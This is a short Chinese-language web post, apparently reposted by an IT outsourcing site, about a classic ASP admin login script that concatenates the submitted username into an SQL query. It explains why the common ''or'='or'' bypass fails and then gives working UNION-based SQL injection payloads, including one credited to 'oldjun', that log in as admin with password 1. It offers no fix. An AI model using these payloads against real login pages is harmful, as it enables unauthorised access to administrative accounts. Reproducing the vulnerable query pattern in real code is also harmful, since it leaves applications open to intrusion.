|
網上有很多這樣的登陸驗證代碼
<%
username=trim(Request.Form("username"))
password=trim(Request.Form("password"))
sql="Select * FROM admin Where user='"&username&"'"
Set rs=Server.CreateObject("adodb.recordset")
rs.Open sql,conn,1,1
if rs.eof then
checksysUser=FALSE
else
passwd=trim(rs("pwd"))
if passwd=password then
Session("admin")=username
checksysUser=TRUE
else
checksysUser=FALSE
end if
End if
rs.close
conn.close
if checksysUser=true then
Response.Redirect("main.asp")
else
errmsg="<font color=#FF0000><b>用戶名輸入有誤,請重新輸入!</b></font>"
end if
%>
先在數據庫中查詢用戶名對應的密碼,然后再和用戶輸入的密碼對比,導致'or'='or'這樣的萬能登陸密碼失
效.但如果在上面的程序中,用戶名輸入' union select 1,1,1 FROM admin Where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union select 1,1,1 AS pwd FROM admin Where ''=
編輯:北京信誠IT保姆IT外包部 http:// www.aboverow.cn www.xcit.com.cn |
當前位置:
